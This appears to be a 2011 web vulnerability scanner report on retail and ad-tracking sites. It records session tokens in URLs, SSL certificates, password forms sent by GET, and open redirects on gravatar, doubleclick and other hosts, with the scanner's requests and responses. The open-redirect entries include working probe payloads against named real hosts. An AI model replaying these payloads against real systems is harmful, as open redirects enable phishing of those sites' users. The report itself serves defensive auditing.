11.1. http://fingerhut.tt.omtrdc.net/m2/fingerhut/mbox/standard previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://fingerhut.tt.omtrdc.net
Path:	/m2/fingerhut/mbox/standard

Issue detail

The URL in the request appears to contain a session token within the query string:

http://fingerhut.tt.omtrdc.net/m2/fingerhut/mbox/standard?mboxHost=www.fingerhut.com&mboxSession=1305509219944-478846&mboxPage=1305509219944-478846&mboxCount=2&mbox=FHTOCP_promobanner&mboxId=0&mboxTime=1305491224154&mboxURL=http%3A%2F%2Fwww.fingerhut.com%2Fuser%2Fstart_credit_app.jsp%3F%26CTid%3D471%26CTKey%3Dcrd10%26CTMedia%3Dx1%26CTProgType%3Dmplus1%26CTUnitSize%3D728x90%26CTTestGrp%3Dstatic%26cm_mmc%3Dx1-_-mplus1-_-728x90-_-static&mboxReferrer=http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fx1.rtb%2Ffingerhut%2Fdoubledma%2Fron%2Fctest%3Bsz%3D728x90%3Bclick%3Dhttp%3A%2F%2Fbn.xp1.ru4.com%2Fbclick%3F_f%3D8BWls1L7DgGK%26_o%3D15607%26_eo%3D747980%26_et%3D1305508796%26_a%3D1791737%26_s%3D0%26_d%3D1125798%26_pm%3D747980%26_pn%3D17918465%26redirect%3D%3Bu%3D17918465%3Bord%3D6394684%3F&mboxVersion=38

Request

GET /m2/fingerhut/mbox/standard?mboxHost=www.fingerhut.com&mboxSession=1305509219944-478846&mboxPage=1305509219944-478846&mboxCount=2&mbox=FHTOCP_promobanner&mboxId=0&mboxTime=1305491224154&mboxURL=http%3A%2F%2Fwww.fingerhut.com%2Fuser%2Fstart_credit_app.jsp%3F%26CTid%3D471%26CTKey%3Dcrd10%26CTMedia%3Dx1%26CTProgType%3Dmplus1%26CTUnitSize%3D728x90%26CTTestGrp%3Dstatic%26cm_mmc%3Dx1-_-mplus1-_-728x90-_-static&mboxReferrer=http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fx1.rtb%2Ffingerhut%2Fdoubledma%2Fron%2Fctest%3Bsz%3D728x90%3Bclick%3Dhttp%3A%2F%2Fbn.xp1.ru4.com%2Fbclick%3F_f%3D8BWls1L7DgGK%26_o%3D15607%26_eo%3D747980%26_et%3D1305508796%26_a%3D1791737%26_s%3D0%26_d%3D1125798%26_pm%3D747980%26_pn%3D17918465%26redirect%3D%3Bu%3D17918465%3Bord%3D6394684%3F&mboxVersion=38 HTTP/1.1
Host: fingerhut.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/user/start_credit_app.jsp?&CTid=471&CTKey=crd10&CTMedia=x1&CTProgType=mplus1&CTUnitSize=728x90&CTTestGrp=static&cm_mmc=x1-_-mplus1-_-728x90-_-static
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
pragma: no-cache
Content-Type: text/javascript
Content-Length: 1336
Date: Mon, 16 May 2011 01:27:04 GMT
Server: Test & Target

var mboxCurrent=mboxFactories.get('default').get('FHTOCP_promobanner',0);mboxCurrent.setEventTime('include.start');document.write('<div style="visibility: hidden; display: none" id="mboxImported-defau
...[SNIP]...

11.2. http://mbox12.offermatica.com/m2/guitarcenter/mbox/standard previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://mbox12.offermatica.com
Path:	/m2/guitarcenter/mbox/standard

Issue detail

The URL in the request appears to contain a session token within the query string:

http://mbox12.offermatica.com/m2/guitarcenter/mbox/standard?mboxHost=www.guitarcenter.com&mboxSession=1305510019406-714170&mboxPage=1305510019406-714170&mboxCount=2&mbox=GC-slider-homepage&mboxId=0&mboxURL=http%3A%2F%2Fwww.guitarcenter.com%2F%3FCJAID%3D10453836%26CJPID%3D2537521&mboxReferrer=&mboxVersion=34

Request

GET /m2/guitarcenter/mbox/standard?mboxHost=www.guitarcenter.com&mboxSession=1305510019406-714170&mboxPage=1305510019406-714170&mboxCount=2&mbox=GC-slider-homepage&mboxId=0&mboxURL=http%3A%2F%2Fwww.guitarcenter.com%2F%3FCJAID%3D10453836%26CJPID%3D2537521&mboxReferrer=&mboxVersion=34 HTTP/1.1
Host: mbox12.offermatica.com
Proxy-Connection: keep-alive
Referer: http://www.guitarcenter.com/?CJAID=10453836&CJPID=2537521
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
pragma: no-cache
Content-Type: text/javascript
Content-Length: 5205
Date: Mon, 16 May 2011 01:40:27 GMT
Server: Test & Target

var mboxCurrent=mboxFactories.get('default').get('GC-slider-homepage',0);mboxCurrent.setEventTime('include.start');document.write('<div style="visibility: hidden; display: none" id="mboxImported-defau
...[SNIP]...

11.3. http://sales.liveperson.net/hc/71737897/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://sales.liveperson.net
Path:	/hc/71737897/

Issue detail

The URL in the request appears to contain a session token within the query string:

http://sales.liveperson.net/hc/71737897/?&visitor=16601155425835&msessionkey=1547318312735205030&site=71737897&cmd=mTagStartPage&lpCallId=941497858081-619992749876&protV=20&lpjson=1&page=http%3A//www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay%3FlangId%3D-1%26storeId%3D10151%26catalogId%3D10551&id=4469883308&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-sonystyle-sales-general-english&activePlugin=none&cobrowse=true&PV%21unit=sonystyle-sales-general&PV%21visitorActive=1&SV%21language=english&title=Sony%20Store%20USA%20%7C%20Sony%20VAIO%AE%20Computers%20%7C%20Sony%20Consumer%20Electronics

Request

GET /hc/71737897/?&visitor=16601155425835&msessionkey=1547318312735205030&site=71737897&cmd=mTagStartPage&lpCallId=941497858081-619992749876&protV=20&lpjson=1&page=http%3A//www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay%3FlangId%3D-1%26storeId%3D10151%26catalogId%3D10551&id=4469883308&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-sonystyle-sales-general-english&activePlugin=none&cobrowse=true&PV%21unit=sonystyle-sales-general&PV%21visitorActive=1&SV%21language=english&title=Sony%20Store%20USA%20%7C%20Sony%20VAIO%AE%20Computers%20%7C%20Sony%20Consumer%20Electronics HTTP/1.1
Host: sales.liveperson.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551
Cookie: HumanClickKEY=1547318312735205030; HumanClickSiteContainerID_71737897=STANDALONE; LivePersonID=LP i=16601155425835,d=1302186497

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 21:20:07 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickSiteContainerID_71737897=STANDALONE; path=/hc/71737897
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Sun, 15 May 2011 21:20:08 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 1998

lpConnLib.Process({"ResultSet": {"lpCallId":"941497858081-619992749876","lpCallConfirm":"","lpJS_Execute":[{"code_id": "SYSTEM!updateButtonStatic_compact.js", "js_code": "function lpUpdateStaticButton
...[SNIP]...

11.4. http://sony.tt.omtrdc.net/m2/sony/mbox/ajax previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://sony.tt.omtrdc.net
Path:	/m2/sony/mbox/ajax

Issue detail

The URL in the request appears to contain a session token within the query string:

http://sony.tt.omtrdc.net/m2/sony/mbox/ajax?mboxHost=www.sonystyle.com&mboxSession=1305494389047-605069&mboxPage=1305494396673-786615&screenHeight=1200&screenWidth=1920&browserWidth=1137&browserHeight=765&browserTimeOffset=-300&colorDepth=24&mboxXDomain=enabled&mboxCount=1&mbox=emptyMbox&mboxId=0&mboxTime=1305476396673&vmt=48FB612B&ppu=TC1&ce=ISO-8859-1&pageName=Sony%20Store&cc=USD&h1=Sony%20Store&c3=StoreCatalogDisplay&c6=Sony%20Store_&c27=Sony%20Store%20-%20Control&v23=United%20States%20English&v27=Sony%20Store%20-%20Control&s=1920x1200&c=24&j=1.7&v=Y&k=Y&bw=1137&bh=765&mboxURL=http%3A%2F%2Fwww.sonystyle.com%2Fwebapp%2Fwcs%2Fstores%2Fservlet%2FStoreCatalogDisplay%3FlangId%3D-1%26storeId%3D10151%26catalogId%3D10551&mboxReferrer=&mboxVersion=40

Request

GET /m2/sony/mbox/ajax?mboxHost=www.sonystyle.com&mboxSession=1305494389047-605069&mboxPage=1305494396673-786615&screenHeight=1200&screenWidth=1920&browserWidth=1137&browserHeight=765&browserTimeOffset=-300&colorDepth=24&mboxXDomain=enabled&mboxCount=1&mbox=emptyMbox&mboxId=0&mboxTime=1305476396673&vmt=48FB612B&ppu=TC1&ce=ISO-8859-1&pageName=Sony%20Store&cc=USD&h1=Sony%20Store&c3=StoreCatalogDisplay&c6=Sony%20Store_&c27=Sony%20Store%20-%20Control&v23=United%20States%20English&v27=Sony%20Store%20-%20Control&s=1920x1200&c=24&j=1.7&v=Y&k=Y&bw=1137&bh=765&mboxURL=http%3A%2F%2Fwww.sonystyle.com%2Fwebapp%2Fwcs%2Fstores%2Fservlet%2FStoreCatalogDisplay%3FlangId%3D-1%26storeId%3D10151%26catalogId%3D10551&mboxReferrer=&mboxVersion=40 HTTP/1.1
Host: sony.tt.omtrdc.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551

Response

HTTP/1.1 200 OK
Content-Type: text/JavaScript
Content-Length: 226
Date: Sun, 15 May 2011 21:19:58 GMT
Server: Test & Target

mboxFactories.get('default').get('emptyMbox',0).cancelTimeout();mboxFactories.get('default').get('emptyMbox',0).setOffer(new mboxOfferDefault()).show();mboxFactories.get('default').getPCId().forceId("
...[SNIP]...

11.5. http://sonycomputerentertai.tt.omtrdc.net/m2/sonycomputerentertai/mbox/standard previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://sonycomputerentertai.tt.omtrdc.net
Path:	/m2/sonycomputerentertai/mbox/standard

Issue detail

The URL in the request appears to contain a session token within the query string:

http://sonycomputerentertai.tt.omtrdc.net/m2/sonycomputerentertai/mbox/standard?mboxHost=us.playstation.com&mboxSession=1305491190457-245340&mboxPage=1305491192268-399662&screenHeight=1200&screenWidth=1920&browserWidth=1136&browserHeight=902&browserTimeOffset=-300&colorDepth=32&mboxCount=2&mbox=mbox_psn&mboxId=0&mboxTime=1305473207208&mboxURL=http%3A%2F%2Fus.playstation.com%2Fpsn%2F&mboxReferrer=&mboxVersion=39

Request

GET /m2/sonycomputerentertai/mbox/standard?mboxHost=us.playstation.com&mboxSession=1305491190457-245340&mboxPage=1305491192268-399662&screenHeight=1200&screenWidth=1920&browserWidth=1136&browserHeight=902&browserTimeOffset=-300&colorDepth=32&mboxCount=2&mbox=mbox_psn&mboxId=0&mboxTime=1305473207208&mboxURL=http%3A%2F%2Fus.playstation.com%2Fpsn%2F&mboxReferrer=&mboxVersion=39 HTTP/1.1
Host: sonycomputerentertai.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://us.playstation.com/psn/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 163
Date: Sun, 15 May 2011 20:26:48 GMT
Server: Test & Target

mboxFactories.get('default').get('mbox_psn',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1305491190457-245340.17");

11.6. http://sonycomputerentertai.tt.omtrdc.net/m2/sonycomputerentertai/sc/standard previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://sonycomputerentertai.tt.omtrdc.net
Path:	/m2/sonycomputerentertai/sc/standard

Issue detail

The URL in the request appears to contain a session token within the query string:

http://sonycomputerentertai.tt.omtrdc.net/m2/sonycomputerentertai/sc/standard?mboxHost=us.playstation.com&mboxSession=1305491190457-245340&mboxPage=1305491190457-245340&screenHeight=1200&screenWidth=1920&browserWidth=1136&browserHeight=902&browserTimeOffset=-300&colorDepth=32&mboxCount=1&mbox=SiteCatalyst%3A%20event&mboxId=0&mboxTime=1305473203602&visitorNamespace=sonycomputerentertainmentofamerica&pageName=PS&currencyCode=USD&events=prodView%2Cevent2&products=%3B&resolution=1920x1200&javascriptVersion=1.6&javaEnabled=Y&cookiesEnabled=Y&trackDownloadLinks=true&trackExternalLinks=true&trackInlineStats=true&linkLeaveQueryString=false&linkDownloadFileTypes=exe%2Czip%2Cwav%2Cmp3%2Cmov%2Cmpg%2Cavi%2Cwmv%2Cpdf%2Cdoc%2Cdocx%2Cxls%2Cxlsx%2Cppt%2Cpptx%2Cflv%2Cswf&linkInternalFilters=javascript%3A%2Cus.playstation.com&linkTrackVars=None&linkTrackEvents=None&hier1=PS&eVar2=PS&prop11=1%3A00PM&eVar11=1%3A00PM&prop12=Sunday&eVar12=Sunday&prop13=Weekend&eVar13=Weekend&eVar17=PS&prop21=Logged%20Out&eVar21=Logged%20Out&prop22=New&eVar22=New&prop30=http%3A%2F%2Fus.playstation.com%2F&eVar30=http%3A%2F%2Fus.playstation.com%2F&prop47=PS&mboxURL=http%3A%2F%2Fus.playstation.com%2F&mboxReferrer=&mboxVersion=39&scPluginVersion=1

Request

GET /m2/sonycomputerentertai/sc/standard?mboxHost=us.playstation.com&mboxSession=1305491190457-245340&mboxPage=1305491190457-245340&screenHeight=1200&screenWidth=1920&browserWidth=1136&browserHeight=902&browserTimeOffset=-300&colorDepth=32&mboxCount=1&mbox=SiteCatalyst%3A%20event&mboxId=0&mboxTime=1305473203602&visitorNamespace=sonycomputerentertainmentofamerica&pageName=PS&currencyCode=USD&events=prodView%2Cevent2&products=%3B&resolution=1920x1200&javascriptVersion=1.6&javaEnabled=Y&cookiesEnabled=Y&trackDownloadLinks=true&trackExternalLinks=true&trackInlineStats=true&linkLeaveQueryString=false&linkDownloadFileTypes=exe%2Czip%2Cwav%2Cmp3%2Cmov%2Cmpg%2Cavi%2Cwmv%2Cpdf%2Cdoc%2Cdocx%2Cxls%2Cxlsx%2Cppt%2Cpptx%2Cflv%2Cswf&linkInternalFilters=javascript%3A%2Cus.playstation.com&linkTrackVars=None&linkTrackEvents=None&hier1=PS&eVar2=PS&prop11=1%3A00PM&eVar11=1%3A00PM&prop12=Sunday&eVar12=Sunday&prop13=Weekend&eVar13=Weekend&eVar17=PS&prop21=Logged%20Out&eVar21=Logged%20Out&prop22=New&eVar22=New&prop30=http%3A%2F%2Fus.playstation.com%2F&eVar30=http%3A%2F%2Fus.playstation.com%2F&prop47=PS&mboxURL=http%3A%2F%2Fus.playstation.com%2F&mboxReferrer=&mboxVersion=39&scPluginVersion=1 HTTP/1.1
Host: sonycomputerentertai.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://us.playstation.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 220
Date: Sun, 15 May 2011 20:26:45 GMT
Server: Test & Target

if (typeof(mboxFactories) !== 'undefined') {mboxFactories.get('default').getPCId().forceId("1305491190457-245340.17");mboxFactories.get('default').get('SiteCatalyst: event', 0).setOffer(new mboxOfferD
...[SNIP]...

12. SSL certificate previous next
There are 4 instances of this issue:

https://www.mcafeesecure.com/
https://store.playstation.com/
https://www.fingerhut.com/
https://www.sonystyle.com/

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.

12.1. https://www.mcafeesecure.com/ previous next

Summary

Severity:	Medium
Confidence:	Certain
Host:	https://www.mcafeesecure.com
Path:	/

Issue detail

The following problem was identified with the server's SSL certificate:

The server's certificate is not trusted.

The server presented the following certificates:

Server certificate

Issued to:	*.mcafeesecure.com
Issued by:	NAI SSL CA v1
Valid from:	Wed May 28 11:56:43 CDT 2008
Valid to:	Fri Apr 26 04:29:07 CDT 2019

Certificate chain #1

Issued to:	NAI SSL CA v1
Issued by:	RSA Public Root CA v1
Valid from:	Wed Oct 17 10:03:55 CDT 2007
Valid to:	Mon Apr 29 04:25:17 CDT 2019

Certificate chain #2

Issued to:	RSA Public Root CA v1
Issued by:	http://www.valicert.com/
Valid from:	Mon May 02 12:34:48 CDT 2005
Valid to:	Tue Apr 30 04:24:00 CDT 2019

Certificate chain #3

Issued to:	http://www.valicert.com/
Issued by:	http://www.valicert.com/
Valid from:	Fri Jun 25 19:22:33 CDT 1999
Valid to:	Tue Jun 25 19:22:33 CDT 2019

12.2. https://store.playstation.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://store.playstation.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	store.playstation.com
Issued by:	PositiveSSL CA
Valid from:	Mon Dec 08 18:00:00 CST 2008
Valid to:	Fri Dec 09 17:59:59 CST 2011

Certificate chain #1

Issued to:	PositiveSSL CA
Issued by:	UTN-USERFirst-Hardware
Valid from:	Sun Sep 17 19:00:00 CDT 2006
Valid to:	Sat May 30 05:48:38 CDT 2020

Certificate chain #2

Issued to:	UTN-USERFirst-Hardware
Issued by:	AddTrust External CA Root
Valid from:	Tue Jun 07 03:09:10 CDT 2005
Valid to:	Sat May 30 05:48:38 CDT 2020

Certificate chain #3

Issued to:	AddTrust External CA Root
Issued by:	AddTrust External CA Root
Valid from:	Tue May 30 05:48:38 CDT 2000
Valid to:	Sat May 30 05:48:38 CDT 2020

Certificate chain #4

Issued to:	AddTrust External CA Root
Issued by:	AddTrust External CA Root
Valid from:	Tue May 30 05:48:38 CDT 2000
Valid to:	Sat May 30 05:48:38 CDT 2020

12.3. https://www.fingerhut.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.fingerhut.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	*.fingerhut.com,ST=MINNESOTA
Issued by:	Akamai Subordinate CA 3
Valid from:	Thu Sep 23 12:29:22 CDT 2010
Valid to:	Fri Sep 23 12:29:22 CDT 2011

Certificate chain #1

Issued to:	Akamai Subordinate CA 3
Issued by:	GTE CyberTrust Global Root
Valid from:	Thu May 11 10:32:00 CDT 2006
Valid to:	Sat May 11 18:59:00 CDT 2013

Certificate chain #2

Issued to:	GTE CyberTrust Global Root
Issued by:	GTE CyberTrust Global Root
Valid from:	Wed Aug 12 19:29:00 CDT 1998
Valid to:	Mon Aug 13 18:59:00 CDT 2018

12.4. https://www.sonystyle.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.sonystyle.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	www.sonystyle.com,ST=California
Issued by:	Akamai Subordinate CA 3
Valid from:	Fri Mar 18 13:54:45 CDT 2011
Valid to:	Sun Mar 18 13:54:45 CDT 2012

Certificate chain #1

Issued to:	Akamai Subordinate CA 3
Issued by:	GTE CyberTrust Global Root
Valid from:	Thu May 11 10:32:00 CDT 2006
Valid to:	Sat May 11 18:59:00 CDT 2013

Certificate chain #2

Issued to:	GTE CyberTrust Global Root
Issued by:	GTE CyberTrust Global Root
Valid from:	Wed Aug 12 19:29:00 CDT 1998
Valid to:	Mon Aug 13 18:59:00 CDT 2018

13. Password field submitted using GET method previous next
There are 2 instances of this issue:

/content/JsContentElementsGNC
/content/JsContentElementsPET

Issue background

The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passords into the URL increases the risk that they will be captured by an attacker.

Issue remediation

All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.

13.1. http://shoprunner.force.com/content/JsContentElementsGNC previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://shoprunner.force.com
Path:	/content/JsContentElementsGNC

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

http://shoprunner.force.com/content/step1

The form contains the following password field:

password2

Request

Response

13.2. http://shoprunner.force.com/content/JsContentElementsPET previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://shoprunner.force.com
Path:	/content/JsContentElementsPET

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

http://shoprunner.force.com/content/step1

The form contains the following password field:

password2

Request

Response

14. Open redirection previous next
There are 11 instances of this issue:

http://0.gravatar.com/avatar/4c44589c9d078af70f5c8c1c46945e93 [d parameter]
http://0.gravatar.com/avatar/6a69081c59ca58f4bb6f7a15970aa073 [d parameter]
http://ad.doubleclick.net/click%3Bh%3Dv8/3b09/f/8c/%2a/j%3B232796950%3B0-0%3B0%3B56677086%3B3454-728/90%3B38609320/38627077/1%3Bu%3D17918465%3B~sscs%3D%3fhttp://bn.xp1.ru4.com/bclick [REST URL parameter 10]
http://b.scorecardresearch.com/r [d.c parameter]
http://bh.contextweb.com/bh/rtset [rurl parameter]
http://i.w55c.net/ping_match.gif [rurl parameter]
http://p.brilig.com/contact/bct [REDIR parameter]
http://pixel.invitemedia.com/pubmatic_sync [pubmatic_callback parameter]
http://r.nexac.com/e/getdata.xgi [ru parameter]
http://s.ixiaa.com/digi/9D763773-52FA-4D45-8966-C91EFF22B643/a.gif [&redirect parameter]
http://sync.mathtag.com/sync/img [redir parameter]

Issue background

Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application which causes a redirection to an arbitrary external domain. This behaviour can be leveraged to facilitate phishing attacks against users of the application. The ability to use an authentic application URL, targeting the correct domain with a valid SSL certificate (if SSL is used) lends credibility to the phishing attack because many users, even if they verify these features, will not notice the subsequent redirection to a different domain.

Issue remediation

If possible, applications should avoid incorporating user-controllable data into redirection targets. In many cases, this behaviour can be avoided in two ways:

Remove the redirection function from the application, and replace links to it with direct links to the relevant target URLs.
Maintain a server-side list of all URLs that are permitted for redirection. Instead of passing the target URL as a parameter to the redirector, pass an index into this list.

If it is considered unavoidable for the redirection function to receive user-controllable input and incorporate this into the redirection target, one of the following measures should be used to minimize the risk of redirection attacks:

The application should use relative URLs in all of its redirects, and the redirection function should strictly validate that the URL received is a relative URL.
The application should use URLs relative to the web root for all of its redirects, and the redirection function should validate that the URL received starts with a slash character. It should then prepend http://yourdomainname.com to the URL before issuing the redirect.
The application should use absolute URLs for all of its redirects, and the redirection function should verify that the user-supplied URL begins with http://yourdomainname.com/ before issuing the redirect.

14.1. http://0.gravatar.com/avatar/4c44589c9d078af70f5c8c1c46945e93 [d parameter] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://0.gravatar.com
Path:	/avatar/4c44589c9d078af70f5c8c1c46945e93

Issue detail

The value of the d request parameter is used to perform an HTTP redirect. The payload http%3a//a37dcf848d117e562/a%3fhttp%3a//0.gravatar.com/avatar/ad516503a11cd5ca435acc9bb6523536%3fs%3d40 was submitted in the d parameter. This caused a redirection to the following URL:

http://a37dcf848d117e562/a?http://0.gravatar.com/avatar/ad516503a11cd5ca435acc9bb6523536?s=40

Request

GET /avatar/4c44589c9d078af70f5c8c1c46945e93?s=40&d=http%3a//a37dcf848d117e562/a%3fhttp%3a//0.gravatar.com/avatar/ad516503a11cd5ca435acc9bb6523536%3fs%3d40&r=G HTTP/1.1
Host: 0.gravatar.com
Proxy-Connection: keep-alive
Referer: http://www.magicalkingdoms.com/blog/2011/05/09/the-dream-differences-on-disney-cruise-line/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Cache-Control: max-age=300
Content-Type: text/html; charset=utf-8
Date: Mon, 16 May 2011 01:26:59 GMT
Expires: Mon, 16 May 2011 01:31:59 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Location: http://a37dcf848d117e562/a?http://0.gravatar.com/avatar/ad516503a11cd5ca435acc9bb6523536?s=40
Server: nginx
Source-Age: 0
Via: 1.1 varnish
X-Varnish: 31704862
Content-Length: 0

14.2. http://0.gravatar.com/avatar/6a69081c59ca58f4bb6f7a15970aa073 [d parameter] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://0.gravatar.com
Path:	/avatar/6a69081c59ca58f4bb6f7a15970aa073

Issue detail

The value of the d request parameter is used to perform an HTTP redirect. The payload http%3a//a6af26a7fbd4f4778/a%3fhttp%3a//0.gravatar.com/avatar/ad516503a11cd5ca435acc9bb6523536%3fs%3d40 was submitted in the d parameter. This caused a redirection to the following URL:

http://a6af26a7fbd4f4778/a?http://0.gravatar.com/avatar/ad516503a11cd5ca435acc9bb6523536?s=40

Request

GET /avatar/6a69081c59ca58f4bb6f7a15970aa073?s=40&d=http%3a//a6af26a7fbd4f4778/a%3fhttp%3a//0.gravatar.com/avatar/ad516503a11cd5ca435acc9bb6523536%3fs%3d40&r=G HTTP/1.1
Host: 0.gravatar.com
Proxy-Connection: keep-alive
Referer: http://www.magicalkingdoms.com/blog/2011/05/09/the-dream-differences-on-disney-cruise-line/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Cache-Control: max-age=300
Content-Type: text/html; charset=utf-8
Date: Mon, 16 May 2011 01:27:40 GMT
Expires: Mon, 16 May 2011 01:32:40 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Location: http://a6af26a7fbd4f4778/a?http://0.gravatar.com/avatar/ad516503a11cd5ca435acc9bb6523536?s=40
Server: nginx
Source-Age: 0
Via: 1.1 varnish
X-Varnish: 254796213
Content-Length: 0

Summary

Severity:	Low
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/click%3Bh%3Dv8/3b09/f/8c/%2a/j%3B232796950%3B0-0%3B0%3B56677086%3B3454-728/90%3B38609320/38627077/1%3Bu%3D17918465%3B~sscs%3D%3fhttp://bn.xp1.ru4.com/bclick

Issue detail

The value of REST URL parameter 10 is used to perform an HTTP redirect. The payload .a7d6d1ac935dd610b/ was submitted in the REST URL parameter 10. This caused a redirection to the following URL:

http://.a7d6d1ac935dd610b//bclick?_f=8BWls1L7DgGK&_o=15607&_eo=747980&_et=1305508796&_a=1791737&_s=0&_d=1125798&_pm=747980&_pn=17918465&redirect=http:%2f%2fwww.fingerhut.com/user/start_credit_app.jsp%3F%26CTid%3D471%26CTKey%3Dcrd10%26CTMedia%3Dx1%26CTProgType%3Dmplus1%26CTUnitSize%3D728x90%26CTTestGrp%3Dstatic%26cm_mmc%3Dx1-_-mplus1-_-728x90-_-static

The application attempts to prevent redirection attacks by prepending an absolute prefix to the user-supplied URL. However, this prefix does not include a trailing slash, so an attacker can add an additional domain name to point to a domain which they control.

Remediation detail

When prepending an absolute prefix to the user-supplied URL, the application should ensure that the prefixed domain name is followed by a slash.

Request

